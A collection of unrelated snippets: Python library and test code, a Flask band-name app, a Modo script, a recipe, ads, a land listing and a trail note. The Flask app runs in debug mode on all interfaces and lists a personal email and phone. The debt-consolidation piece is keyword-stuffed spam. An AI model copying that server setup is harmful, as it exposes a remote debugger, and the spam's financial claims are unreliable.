from ..helpers import ResourceBase, FilteredIterableResource
from ..errors import ok_or_error, response_or_error
from ..compat import update_doc
class Groups(ResourceBase, FilteredIterableResource):
    @response_or_error
    def add(self, group):
        """
        Add a group, returns a dictionary containing the group name
        """
        return self._client.post(self.url(), {}, params=dict(name=group))

    @ok_or_error
    def delete(self, group):
        """
        Delete a group.
        """
        return self._client.delete(self.url(), params=dict(name=group))

    @ok_or_error
    def add_user(self, group, user):
        """
        Add a user to a group.
        """
        return self._client.post(self.url("/add-user"), dict(context=group, itemName=user))

    @ok_or_error
    def remove_user(self, group, user):
        """
        Remove a user from a group.
        """
        return self._client.post(self.url("/remove-user"), dict(context=group, itemName=user))

    def more_members(self, group, filter=None):
        """
        Retrieves a list of users that are members of a specified group.

        filter: return only users with usernames, display names or email
        addresses containing this string
        """
        params = dict(context=group)
        if filter:
            params['filter'] = filter
        return self.paginate("/more-members", params)

    def more_non_members(self, group, filter=None):
        """
        Retrieves a list of users that are not members of a specified group.

        filter: return only users with usernames, display names or email
        addresses containing this string
        """
        params = dict(context=group)
        if filter:
            params['filter'] = filter
        return self.paginate("/more-non-members", params)
update_doc(Groups.all, """
Returns an iterator that will walk all the groups, paginating as necessary.
filter: if specified only group names containing the supplied string will be returned
""")
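The `response_or_error` and `ok_or_error` decorators imported above are not shown in this file; presumably they translate the raw HTTP response into either a parsed body or a boolean success flag. A minimal sketch of that pattern — the `_sketch` names and the dict-shaped response are assumptions for illustration, not the library's actual API:

```python
def ok_or_error_sketch(fn):
    # Hypothetical: treat any 2xx status as success, otherwise raise
    def wrapper(*args, **kwargs):
        response = fn(*args, **kwargs)
        if 200 <= response["status"] < 300:
            return True
        raise RuntimeError("request failed: %s" % response["status"])
    return wrapper

@ok_or_error_sketch
def delete_group(name):
    # Stand-in for self._client.delete(...); returns a fake response dict
    return {"status": 204}
```

With this stub, `delete_group("old-team")` returns `True`, mirroring how the decorated `delete` above would report success to its caller.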
|
Prepare an 8- x 8-inch pan by wetting it lightly with water.
Place 4 tablespoons gelatin in 1/4 cup cold water to soften for about 5 minutes.
Place the raspberry juice, 6 tablespoons sugar, and 4 tablespoons corn syrup in a medium saucepan over medium heat and stir until sugar dissolves.
Stir in the gelatin and continue stirring until gelatin dissolves.
At this point add food coloring, if you're using it.
Pour into prepared pan and refrigerate for 1 hour, until set.
Repeat procedure with orange juice: place 4 tablespoons gelatin in 1/4 cup cold water to soften for about 5 minutes.
Place the orange juice, 6 tablespoons sugar, and 4 tablespoons corn syrup in a medium saucepan over medium heat and stir until sugar dissolves.
At this point, add food coloring, if using.
Remove from heat and allow to cool for 10 minutes in pan.
Pour over raspberry layer and refrigerate for 1 hour, until set.
When set, turn out of the pan and cut with a sharp knife into long, thin strips to resemble worms.
Enjoy in pudding dirt cups or by themselves.
Raspberry juice can be obtained by boiling fresh or frozen raspberries over medium heat. Place 1 1/2 cups of berries in a small saucepan and heat, stirring occasionally, until they are very liquidy. Pour through a strainer, reserving juice, and press fruit against the strainer to squeeze out all the juice.
|
from flask import Flask, render_template
import datetime
from os import listdir
from os.path import isfile, join
import twitter as tw
import image_overlay as ilay
import band_name as bn
app = Flask(__name__)
app.debug = True
names_made=0
page_info = {}
page_info['business_name'] = u"Band Name Generator"
page_info['description'] = u"Get your band name generated here."
page_info['about'] = u"We make the band name for real."
page_info['phone'] = u"(900) 985-2781"
page_info['phone_link'] = u"+1"
page_info['address'] = u"Saint Joseph, MO"
page_info['email'] = u"jaredhaer@gmail.com"
page_info['facebook'] = u"https://www.facebook.com/jared.haer"
page_info['twitter'] = u"https://twitter.com/jared216"
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
page_info["moment"]=str(datetime.datetime.now())
@app.route("/")
def index():
    page_info["moment"] = str(datetime.datetime.now())
    return render_template("index.html", page_info=page_info)

@app.route("/band_name")
def bandName():
    global names_made
    page_info['band_name'] = bn.getName()
    bname = page_info['band_name']
    p = "./static/"
    fn_out = 'images/band_names/' + str(names_made % 12 + 1) + '.png'
    print(ilay.makeImage(bname, fn_in='./bg.png', fn_out=p + fn_out))
    page_info['band_image'] = fn_out
    names_made += 1
    # page_info['tweet_status']=tw.tweetImage(bn.getTweet(bname),ilay.makeImage(bname))
    page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
    return render_template("band_name.html", page_info=page_info)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5004)
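The generated images cycle through a fixed pool of twelve files (`1.png` through `12.png`), driven by the `names_made % 12 + 1` expression in `bandName` above. Pulled out on its own (the helper name is ours, not the app's), the scheme looks like:

```python
def output_filename(names_made, slots=12):
    # The counter wraps, so the 13th generated name overwrites 1.png again
    return 'images/band_names/' + str(names_made % slots + 1) + '.png'
```

This keeps disk usage bounded at the cost of old band-name images being overwritten once the counter wraps.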
|
This property is in a beautiful area just outside the city, a short half-mile drive to the city limits of Inverness. The Inverness area is a growing community and a quality location for families and residential development. Nearby you will find abundant amenities such as retail, restaurants, schools, and jobs. The immediate area is primarily rural residential. The property borders the Withlacoochee State Forest/Citrus Wildlife Management area to the west and south, which provides privacy for the parcel and the future development community.
|
#python
# Random scale & rotation tool
# Supports transforming individual mesh items from selection, or each polygon island within the mesh items
# Author: Jose Lopez Romo - Zhibade
import modo
import lx
import random
import sys  # needed for sys.exit() in the dialog checks below
def query_user_value(user_value):
    """
    Utility function for querying user values
    """
    return lx.eval("user.value {0} ?".format(user_value))
SCALE_LIMITS_X = [query_user_value('zbRandScaleRot_scaleMinX'), query_user_value('zbRandScaleRot_scaleMaxX')]
SCALE_LIMITS_Y = [query_user_value('zbRandScaleRot_scaleMinY'), query_user_value('zbRandScaleRot_scaleMaxY')]
SCALE_LIMITS_Z = [query_user_value('zbRandScaleRot_scaleMinZ'), query_user_value('zbRandScaleRot_scaleMaxZ')]
SCALE_LIMITS_U = [query_user_value('zbRandScaleRot_scaleMinU'), query_user_value('zbRandScaleRot_scaleMaxU')]
ROT_LIMITS_X = [query_user_value('zbRandScaleRot_rotMinX'), query_user_value('zbRandScaleRot_rotMaxX')]
ROT_LIMITS_Y = [query_user_value('zbRandScaleRot_rotMinY'), query_user_value('zbRandScaleRot_rotMaxY')]
ROT_LIMITS_Z = [query_user_value('zbRandScaleRot_rotMinZ'), query_user_value('zbRandScaleRot_rotMaxZ')]
TRANSLATE_LIMITS_X = [query_user_value('zbRandScaleRot_translateMinX'), query_user_value('zbRandScaleRot_translateMaxX')]
TRANSLATE_LIMITS_Y = [query_user_value('zbRandScaleRot_translateMinY'), query_user_value('zbRandScaleRot_translateMaxY')]
TRANSLATE_LIMITS_Z = [query_user_value('zbRandScaleRot_translateMinZ'), query_user_value('zbRandScaleRot_translateMaxZ')]
APPLY_SCALE = query_user_value('zbRandScaleRot_scale')
APPLY_ROTATION = query_user_value('zbRandScaleRot_rotate')
APPLY_TRANSLATE = query_user_value('zbRandScaleRot_translate')
UNIFORM_SCALE = query_user_value('zbRandScaleRot_uniformScale')
POLYGON_ISLANDS = query_user_value('zbRandScaleRot_polyIslands')
PIVOT_POSITION = query_user_value('zbRandScaleRot_pivotPosition')
VALID_PIVOT_POSITIONS = ['Center', 'Top', 'Bottom', 'Left', 'Right', 'Front', 'Back']
def selection_check(selected_items):
    """
    Checks current selection and stops the script if no mesh item is selected
    """
    if not selected_items:
        lx.eval("dialog.setup warning")
        lx.eval("dialog.title Warning")
        lx.eval("dialog.msg {No mesh items selected}")
        lx.eval('dialog.result ok')
        lx.eval('dialog.open')
        sys.exit()

def pivot_check():
    """
    Checks pivot position value and stops the script if it isn't valid
    """
    if PIVOT_POSITION not in VALID_PIVOT_POSITIONS:
        lx.eval("dialog.setup warning")
        lx.eval("dialog.title Warning")
        lx.eval("dialog.msg {Invalid pivot position}")
        lx.eval('dialog.result ok')
        lx.eval('dialog.open')
        sys.exit()
def random_transform():
    """
    Transforms current selection randomly as defined by scale and rotation limits in user values
    """
    if APPLY_SCALE:
        if UNIFORM_SCALE:
            scale_u = random.uniform(SCALE_LIMITS_U[0], SCALE_LIMITS_U[1])
            lx.eval("transform.channel scl.X {0}".format(scale_u))
            lx.eval("transform.channel scl.Y {0}".format(scale_u))
            lx.eval("transform.channel scl.Z {0}".format(scale_u))
        else:
            scale_x = random.uniform(SCALE_LIMITS_X[0], SCALE_LIMITS_X[1])
            scale_y = random.uniform(SCALE_LIMITS_Y[0], SCALE_LIMITS_Y[1])
            scale_z = random.uniform(SCALE_LIMITS_Z[0], SCALE_LIMITS_Z[1])
            lx.eval("transform.channel scl.X {0}".format(scale_x))
            lx.eval("transform.channel scl.Y {0}".format(scale_y))
            lx.eval("transform.channel scl.Z {0}".format(scale_z))
    if APPLY_ROTATION:
        rot_x = random.uniform(ROT_LIMITS_X[0], ROT_LIMITS_X[1])
        rot_y = random.uniform(ROT_LIMITS_Y[0], ROT_LIMITS_Y[1])
        rot_z = random.uniform(ROT_LIMITS_Z[0], ROT_LIMITS_Z[1])
        lx.eval("transform.channel rot.X {0}".format(rot_x))
        lx.eval("transform.channel rot.Y {0}".format(rot_y))
        lx.eval("transform.channel rot.Z {0}".format(rot_z))
    if APPLY_TRANSLATE:
        translate_x = random.uniform(TRANSLATE_LIMITS_X[0], TRANSLATE_LIMITS_X[1])
        translate_y = random.uniform(TRANSLATE_LIMITS_Y[0], TRANSLATE_LIMITS_Y[1])
        translate_z = random.uniform(TRANSLATE_LIMITS_Z[0], TRANSLATE_LIMITS_Z[1])
        lx.eval("transform.channel pos.X {0}".format(translate_x))
        lx.eval("transform.channel pos.Y {0}".format(translate_y))
        lx.eval("transform.channel pos.Z {0}".format(translate_z))
def transform_polygon_islands():
    """
    Takes all polygon islands inside the selected mesh items and transforms them randomly.
    The pivot of the transformation depends on the user value set in the UI
    """
    scene = modo.Scene()
    mesh_items = scene.selectedByType('mesh')
    selection_check(mesh_items)
    for item in mesh_items:
        scene.select(item)
        geometry = item.geometry
        # This mesh will be used to store polygon islands temporarily
        final_mesh = scene.addMesh("zbFinalScaledMeshes")
        all_polys = list(geometry.polygons)
        # Scale all polygon islands and store them in the temporary mesh
        while all_polys:
            all_polys[0].select(True)
            lx.eval("select.polygonConnect m3d false")
            lx.eval("select.cut")
            temp_mesh = scene.addMesh("zbTempScaleMesh")
            scene.select(temp_mesh)
            lx.eval("select.paste")
            lx.eval("select.type item")
            lx.eval("center.bbox {0}".format(PIVOT_POSITION.lower()))
            random_transform()
            lx.eval("select.cut")
            scene.select(final_mesh)
            lx.eval("select.paste")
            scene.removeItems(temp_mesh)
            scene.select(item)
            all_polys = list(geometry.polygons)
        # Cut all polygon islands back to the original mesh and clean scene
        scene.select(final_mesh)
        lx.eval("select.all")
        lx.eval("select.cut")
        scene.select(item)
        lx.eval("select.paste")
        scene.removeItems(final_mesh)
def transform_mesh_items():
    """
    Takes all the selected mesh items and transforms them randomly.
    """
    scene = modo.Scene()
    mesh_items = scene.selectedByType('mesh')
    selection_check(mesh_items)
    for item in mesh_items:
        scene.select(item)
        random_transform()

if POLYGON_ISLANDS:
    pivot_check()
    transform_polygon_islands()
else:
    transform_mesh_items()
|
If a print ad pops out at you from a page, unfolds magically before your eyes, lights up, sings a song or emits a scent, chances are it was created by Structural Graphics. Structural Graphics is the nation’s leading resource for high-impact print marketing solutions. With over 30 years of experience, they create and produce highly interactive direct mail, collateral, magazine inserts, P.O.P. displays, sales aids and promotional packaging pieces.
Structural Graphics has been using Crystal Clear Bags™ for many years to increase the “pop” and response rate for direct mail campaigns. The Structural Graphics Vice-President of Marketing recently shared his experiences with ClearBags™.
Paper Zone is a retail store filled with fun, interesting, unique paper products and accessories with a selection that you simply can't find anywhere else. It is a discovery zone where customers can come to find exactly what they need, discover things that they didn't know existed, and leave feeling that they've found a new favorite place to shop. With over 440 different types of paper, 175 crafting tools, 130 types of adhesive and 75 styles of boxes for packing and shipping, Paper Zone will help you find everything you need for your card-making, crafting or business needs.
Paper Zone has been using Crystal Clear Bags™ for many years to promote and protect their products. Recently they shared their experiences with ClearBags™.
"At Paper Zone, we find a lot of uses for Crystal Clear Bags. We are constantly sending out sample boards to our stores to display as customer inspiration to make cards, invites and paper craft ideas. The only solution to protect these samples and keep them intact for customers to see for years to come is Crystal Clear Bags. These bags allow us to beautifully showcase our samples while keeping them untouched and viewable through the Crystal Clear packaging."
"Our customers love to use ClearBags™ as a way to showcase their handmade cards, stationery and art. At ClearBags we can always find the perfect bag for every project."
Paper Zone uses a number of Crystal Clear Bags in various sizes, including the 5x7" B7B1, to help promote and protect their products. In addition, Paper Zone enjoys the great presentation that Crystal Clear Boxes™ provide for cards, such as the 5x7" FB4.
Whether you are a large retail chain, or a sole proprietor, ClearBags has the packaging that will help you promote, protect, and preserve your greatest endeavors.
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from ....extern.six.moves import cStringIO as StringIO
from ... import ascii
from .common import (assert_equal, assert_almost_equal,
setup_function, teardown_function)
def assert_equal_splitlines(arg1, arg2):
    assert_equal(arg1.splitlines(), arg2.splitlines())
def test_read_normal():
    """Normal SimpleRST Table"""
    table = """
# comment (with blank line above)
======= =========
   Col1      Col2
======= =========
    1.2   "hello"
    2.4 's worlds
======= =========
"""
    reader = ascii.get_reader(Reader=ascii.RST)
    dat = reader.read(table)
    assert_equal(dat.colnames, ['Col1', 'Col2'])
    assert_almost_equal(dat[1][0], 2.4)
    assert_equal(dat[0][1], '"hello"')
    assert_equal(dat[1][1], "'s worlds")
def test_read_normal_names():
    """Normal SimpleRST Table with provided column names"""
    table = """
# comment (with blank line above)
======= =========
   Col1      Col2
======= =========
    1.2   "hello"
    2.4 's worlds
======= =========
"""
    reader = ascii.get_reader(Reader=ascii.RST,
                              names=('name1', 'name2'))
    dat = reader.read(table)
    assert_equal(dat.colnames, ['name1', 'name2'])
    assert_almost_equal(dat[1][0], 2.4)
def test_read_normal_names_include():
    """Normal SimpleRST Table with provided column names"""
    table = """
# comment (with blank line above)
======= ========== ======
   Col1       Col2   Col3
======= ========== ======
    1.2    "hello"      3
    2.4  's worlds      7
======= ========== ======
"""
    reader = ascii.get_reader(Reader=ascii.RST,
                              names=('name1', 'name2', 'name3'),
                              include_names=('name1', 'name3'))
    dat = reader.read(table)
    assert_equal(dat.colnames, ['name1', 'name3'])
    assert_almost_equal(dat[1][0], 2.4)
    assert_equal(dat[0][1], 3)
def test_read_normal_exclude():
    """Nice, typical SimpleRST table with col name excluded"""
    table = """
======= ==========
   Col1       Col2
======= ==========
    1.2    "hello"
    2.4  's worlds
======= ==========
"""
    reader = ascii.get_reader(Reader=ascii.RST,
                              exclude_names=('Col1',))
    dat = reader.read(table)
    assert_equal(dat.colnames, ['Col2'])
    assert_equal(dat[1][0], "'s worlds")
def test_read_unbounded_right_column():
    """The right hand column should be allowed to overflow"""
    table = """
# comment (with blank line above)
===== ===== ====
 Col1  Col2 Col3
===== ===== ====
  1.2     2 Hello
  2.4     4 Worlds
===== ===== ====
"""
    reader = ascii.get_reader(Reader=ascii.RST)
    dat = reader.read(table)
    assert_equal(dat[0][2], "Hello")
    assert_equal(dat[1][2], "Worlds")
def test_read_unbounded_right_column_header():
    """The right hand column should be allowed to overflow"""
    table = """
# comment (with blank line above)
===== ===== ====
 Col1  Col2 Col3Long
===== ===== ====
  1.2     2 Hello
  2.4     4 Worlds
===== ===== ====
"""
    reader = ascii.get_reader(Reader=ascii.RST)
    dat = reader.read(table)
    assert_equal(dat.colnames[-1], "Col3Long")
def test_read_right_indented_table():
    """We should be able to read right indented tables correctly"""
    table = """
# comment (with blank line above)
   ==== ==== ====
   Col1 Col2 Col3
   ==== ==== ====
      3  3.4  foo
      1  4.5  bar
   ==== ==== ====
"""
    reader = ascii.get_reader(Reader=ascii.RST)
    dat = reader.read(table)
    assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
    assert_equal(dat[0][2], "foo")
    assert_equal(dat[1][0], 1)
def test_trailing_spaces_in_row_definition():
    """ Trailing spaces in the row definition column shouldn't matter"""
    table = """
# comment (with blank line above)
   ==== ==== ====    
   Col1 Col2 Col3
   ==== ==== ====    
      3  3.4  foo
      1  4.5  bar
   ==== ==== ====    
"""  # noqa
    reader = ascii.get_reader(Reader=ascii.RST)
    dat = reader.read(table)
    assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
    assert_equal(dat[0][2], "foo")
    assert_equal(dat[1][0], 1)

table = """\
====== =========== ============ ===========
  Col1        Col2         Col3        Col4
====== =========== ============ ===========
   1.2     "hello"            1           a
   2.4   's worlds            2           2
====== =========== ============ ===========
"""
dat = ascii.read(table, Reader=ascii.RST)
def test_write_normal():
    """Write a table as a normal SimpleRST Table"""
    out = StringIO()
    ascii.write(dat, out, Writer=ascii.RST)
    assert_equal_splitlines(out.getvalue(), """\
==== ========= ==== ====
Col1      Col2 Col3 Col4
==== ========= ==== ====
 1.2   "hello"    1    a
 2.4 's worlds    2    2
==== ========= ==== ====
""")
|
This is an extension of the Arnett Canyon Trail and links into the Telegraph Canyon Trail.
|
from collections import OrderedDict
from levenshteinDistance import levenshtein as ld
#------------------------
# shared variables:
#------------------------
words = OrderedDict()
words['Eng'] = ''
words['Ger'] = ''
words['Por'] = ''
words['Pol'] = ''
outputFilename = 'output.txt'
allophones = {
    'aeiou': 'a',
    'bp': 'b',
    'cjsz': 'z',
    'dt': 'd',
    'fv': 'v',
    'gkq': 'g',
    'hx': 'h',
    'lr': 'l',
    'mn': 'm',
    'w': 'w',
    'y': 'y'
}
#------------------------
# functions:
#------------------------
def respellWithInitialVowelAndConsonants(word):
    for char in word[1:]:
        if char in 'aeiou':
            word = word[0] + word[1:].replace(char, '')
    return word

def respellWithAllophones(word):
    for char in word:
        for allo in allophones:
            if char in allo:
                word = word.replace(char, allophones[allo])
    return word

def combineOverlappingWords(shortList):
    for language in shortList:
        for otherlanguage in shortList:
            if language != otherlanguage and language != 'Eng' and otherlanguage != 'Eng':
                a = shortList[language]
                b = shortList[otherlanguage]
                for i in range(1, len(b)):
                    if a.endswith(b[:i]):
                        shortList[otherlanguage] = ''
                        shortList[language] = a + b[i:]
    return shortList

def evaluateScore_Levenshtein(word, originalWords):
    score = 0
    score_maximize = 100  # just to keep score positive
    score_minimize = 0
    for lang in originalWords:
        score_minimize += ld(word, lang)
    score = score_maximize - score_minimize
    return score
def evaluateScore_AlloWithVowels(word, originalWords):
    score = 0
    scoreLangs = [0] * len(originalWords)
    leastEfficientWord = ''.join(originalWords)
    # ABZDAVG allo w/ vowels
    alloWithVowels = respellWithAllophones(word)
    #print 'Allophone Form of Word, with Vowels: ', alloWithVowels
    alloOriginalWords = list(originalWords)  # careful with creating references that overwrite!
    for index, srcWord in enumerate(alloOriginalWords):
        alloOriginalWords[index] = respellWithAllophones(srcWord)
    #print alloOriginalWords
    # get preliminary scores for each language:
    for lang, srcWordAllo in enumerate(alloOriginalWords):
        for i in range(len(srcWordAllo)):
            head = srcWordAllo[:i]
            if head in respellWithAllophones(word):
                # add to score per matching letter of word:
                scoreLangs[lang] += 1
    # adjust language scores by number of characters in original words:
    for lang, srcWordAllo in enumerate(alloOriginalWords):
        scoreLangs[lang] -= len(srcWordAllo)
    # language scores are weighted in reverse order
    scoreLangs.reverse()
    for wt, lang in enumerate(scoreLangs):
        score += lang + lang * ((wt + 1) / 10.0)  # weightings like these make a gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
    #print 'language score contribution: ', score
    # get preliminary score for word length:
    scoreLen = (len(leastEfficientWord) - len(word))  # score increases with shorter word
    scoreLen *= 1.1  # this is the weighting for length score
    #print 'word length contribution', scoreLen
    score += scoreLen
    return round(score, 2)
def evaluateScore_ConsonantsInOrder(word, originalWords):
    score = 0
    scoreLangs = [0] * len(originalWords)
    leastEfficientWord = ''.join(originalWords)
    alloConsonants = list(originalWords)  # careful with creating references that overwrite!
    alloOfNewWord = respellWithAllophones(word).replace('a', '').replace('e', '').replace('i', '').replace('o', '').replace('u', '')
    #print alloOfNewWord
    for index, srcWord in enumerate(alloConsonants):
        alloConsonants[index] = respellWithAllophones(srcWord).replace('a', '').replace('e', '').replace('i', '').replace('o', '').replace('u', '')
    #print alloConsonants
    # BZDVG
    # go through each language's test pattern:
    for lang, testPattern in enumerate(alloConsonants):
        currentLetterPos = 0
        # go through as many letters of that test pattern as possible:
        for i in range(1, len(testPattern)):
            # if that letter is found in new word then update current letter position (= index+1 since list indices start at 0):
            if testPattern[i] in alloOfNewWord:
                #print testPattern[i]
                currentLetterPos = i + 1
        # use full word length - the current letter into the test pattern as the score for that language
        scoreLangs[lang] = currentLetterPos - len(originalWords[lang])
        currentLetterPos = 0
    #print scoreLangs
    # language scores are weighted in reverse order
    scoreLangs.reverse()
    for wt, lang in enumerate(scoreLangs):
        score += lang + lang * ((wt + 1) / 10.0)  # weightings like these make a gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
    # get preliminary score for word length:
    scoreLen = (len(leastEfficientWord) - len(word))  # score increases with shorter word
    scoreLen *= 1.1  # this is the weighting for length score
    #print 'word length contribution', scoreLen
    score += scoreLen
    return round(score, 2)
def evaluateScore_LettersFromEachSource(word, originalWords):
    score = 0
    for letter in word:
        for srcWord in originalWords:
            # encourage using words with letters found in all source words
            score += 1 if letter in srcWord else 0
    return score

def penalizeRepeatedLetterSequences(word):
    score = 0
    currentLetter = ''
    for letter in word:
        if letter == currentLetter:
            score -= 1
        else:
            currentLetter = letter
    return score

def penalizeLength(word):
    return -len(word)

def penalizeZeroLetters(word):
    if word == '':
        return -1
    return 0

def penalizeNoVowels(word):
    for vowel in 'aeiou':
        if vowel in word:
            return 1
    if len(word) > 1:  # don't force a vowel if the word is only 1-letter long
        return -1
    return 0

def penalizeInstructionComplexity(instruction):  # TODO
    score = 0
    return score

def evaluate(line):
    newWord = line.split(',')[0]
    originalWords = line.split(',')[2:]
    score = 0
    score += evaluateScore_AlloWithVowels(newWord, originalWords)
    score += evaluateScore_ConsonantsInOrder(newWord, originalWords)
    score -= evaluateScore_Levenshtein(newWord, originalWords)
    score += evaluateScore_LettersFromEachSource(newWord, originalWords)
    score += penalizeRepeatedLetterSequences(newWord)
    score += penalizeLength(newWord)
    score += penalizeZeroLetters(newWord)
    score += penalizeNoVowels(newWord)
    # score += penalizeInstructionComplexity(instruction)  # TODO
    return round(score, 2)
#------------------------
# main part of the program:
#------------------------
# get lines of file into a list:
with open(outputFilename, 'r') as f1:
    data = f1.readlines()
# fill arrays:
for line in data:
    if ',' in line:
        print(evaluate(line))
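The `levenshteinDistance` module imported at the top is not included here. A standard dynamic-programming implementation of what it presumably provides (the function name matches the import, but this is a sketch of the textbook algorithm, not that module's actual code):

```python
def levenshtein(a, b):
    # prev[j] holds the edit distance between a[:i-1] and b[:j]; each pass
    # builds the next row of the classic DP table in O(len(b)) memory.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # deletion
                           cur[j - 1] + 1,               # insertion
                           prev[j - 1] + (ca != cb)))    # substitution
        prev = cur
    return prev[-1]
```

For example, `levenshtein("kitten", "sitting")` is 3, which is the kind of per-language distance `evaluateScore_Levenshtein` sums up.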
|
Debt consolidation Marietta works, try it today. Debt is not a new phenomenon. Problems with debts have been here for as long as humanity itself. However, how we manage our debts has evolved over the years in Marietta Pennsylvania. For example, people no longer have to slave for feudal lords in Marietta just because they could not pay up their credit cards. Nowadays, creditors are civil about how they collect their debts.
You will never have to deal with bankruptcy lawyers and/or courts in Marietta if you learn how to manage your credit cards well. This is especially true in the modern economy in Marietta that we live in. Now, you can actually consolidate your debt with credit consolidating programs instead of having many creditors. Debt consolidation Marietta comes with numerous credit card debt settlement benefits.
Negotiating with your creditors in Marietta can be a very frustrating experience. They rarely listen; in fact, they usually ask for unanticipated higher interest rates when you ask for a longer repayment period on your online cash advance lending. Conversely, they will ask for a shorter debt consolidation repayment period on your fast cash loans if you ask for a lower interest rate. This debt consolidation dispute will go on and on just because you are an individual living in Marietta PA trying to make ends meet.
However, the presence of a credit management company changes everything. You will now be able to negotiate better terms with your debt consolidation creditors if you decide to consolidate your credit cards. This is because the presence of a credit management service assures your creditors that they will receive their fast loan payments in due time. This makes the debt consolidation creditors more flexible as you negotiate credit consolidating terms with them.
Free help for your Marietta debts.
Lower your monthly consolidation payments and get out of debt fast. Our debt consolidation services and credit consolidating professionals can help you get debt free fast. Simply use the form on the right to contact an expert credit consolidating agent who can help you gain commercial control over all of your credit card debt or loan problems today! Anyone from can use our debt management services, free debt consolidation services from DebtCafe USA.
If you are like individuals residing in Marietta PA, you are starting to feel the pinch from the market collapse in Marietta and you want to know how you can save on interest charges with debt consolidation in Marietta and get out of debt. You may have tried to obtain credit counseling products from the local consolidation lending institutions in Marietta PA, but the banks just aren't willing to assist, and monetary companies want way too much in interest in Marietta and other up-front fees. At DebtCafe we have the perfect credit card debt consolidating solution. Your debt consolidation creditors realize the value in Marietta of obtaining their money back, so they're willing to assist us by decreasing, or even removing, late fees and additional interest costs in Marietta when you use one of our credit management services.
Our credit card settlement experts will explain to you how debt consolidation can help you minimize or eliminate credit card debts charges, and simplify your debt relief repayment with just a single debt management payment each month. If you are from and you need to set up your free debt counseling analysis, simply complete the FREE debt consolidation form above.
Once the free debt management form above has been completed in Marietta PA, you gain access to your very own network of credit card debt and debt settlement specialists who will run a simple but effective assessment of your personal bills situation. This will be used to figure out the very best debt counselling options for you. It is vitally important in Marietta for all involved to completely understand where you are at with your bills situation, because without these particulars the counselors in Marietta cannot offer a correct evaluation and determine the best customized Marietta PA debt consolidation program that gets you out of debt while putting extra cash in your pocket at the same time. By finishing this free debt consultation, the credit card negotiation team will be able to help you save thousands in interest and possibly principal amounts as well in Marietta PA.
|
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK rest-python.
#
# REDHAWK rest-python is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK rest-python is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
"""
redhawk.py
Asynchronous Tornado service for REDHAWK. Maps the functions
in domain.py and caches the domain object.
"""
from _utils.tasking import background_task
from domain import Domain, scan_domains, ResourceNotFound
class Redhawk(object):
__domains = {}
def _get_domain(self, domain_name):
name = str(domain_name)
if not name in self.__domains:
self.__domains[name] = Domain(domain_name)
return self.__domains[name]
##############################
# DOMAIN
@background_task
def get_domain_list(self):
return scan_domains()
@background_task
def get_domain_info(self, domain_name):
dom = self._get_domain(domain_name)
return dom.get_domain_info()
@background_task
def get_domain_properties(self, domain_name):
dom = self._get_domain(domain_name)
return dom.properties()
##############################
# APPLICATION
@background_task
def get_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.find_app(app_id)
@background_task
def get_application_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.apps()
@background_task
def get_available_applications(self, domain_name):
dom = self._get_domain(domain_name)
return dom.available_apps()
@background_task
def launch_application(self, domain_name, app_name):
dom = self._get_domain(domain_name)
return dom.launch(app_name)
@background_task
def release_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.release(app_id)
##############################
# COMPONENT
@background_task
def get_component(self, domain_name, app_id, comp_id):
dom = self._get_domain(domain_name)
return dom.find_component(app_id, comp_id)
@background_task
def get_component_list(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.components(app_id)
@background_task
def component_configure(self, domain_name, app_id, comp_id, new_properties):
dom = self._get_domain(domain_name)
comp = dom.find_component(app_id, comp_id)
configure_changes = {}
for prop in comp._properties:
if prop.id in new_properties:
if new_properties[prop.id] != prop.queryValue():
configure_changes[prop.id] = (type(prop.queryValue()))(new_properties[prop.id])
return comp.configure(configure_changes)
##############################
# DEVICE MANAGER
@background_task
def get_device_manager(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.find_device_manager(device_manager_id)
@background_task
def get_device_manager_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.device_managers()
##############################
# DEVICE
@background_task
def get_device_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.devices(device_manager_id)
@background_task
def get_device(self, domain_name, device_manager_id, device_id):
dom = self._get_domain(domain_name)
return dom.find_device(device_manager_id, device_id)
##############################
# SERVICE
@background_task
def get_service_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.services(device_manager_id)
##############################
# GENERIC
@background_task
def get_object_by_path(self, path, path_type):
'''
        Locates a REDHAWK object with the given path and path type.
Returns the object + remaining path:
comp, opath = locate(ipath, 'component')
Valid path types are:
'application' - [ domain id, application-id ]
'component' - [ domain id, application-id, component-id ]
'device-mgr' - [ domain id, device-manager-id ]
'device' - [ domain id, device-manager-id, device-id ]
'''
domain = self._get_domain(path[0])
if path_type == 'application':
return domain.find_app(path[1]), path[2:]
elif path_type == 'component':
return domain.find_component(path[1], path[2]), path[3:]
elif path_type == 'device-mgr':
return domain.find_device_manager(path[1]), path[2:]
elif path_type == 'device':
return domain.find_device(path[1], path[2]), path[3:]
raise ValueError("Bad path type %s. Must be one of application, component, device-mgr or device" % path_type)
|
Elite Printing, Inc. is a Certified Women-Owned Business, family owned and operated since 1986. Our outstanding customer service helps us excel in providing an easy ordering process. We have two locations to better serve Indianapolis and the surrounding areas.
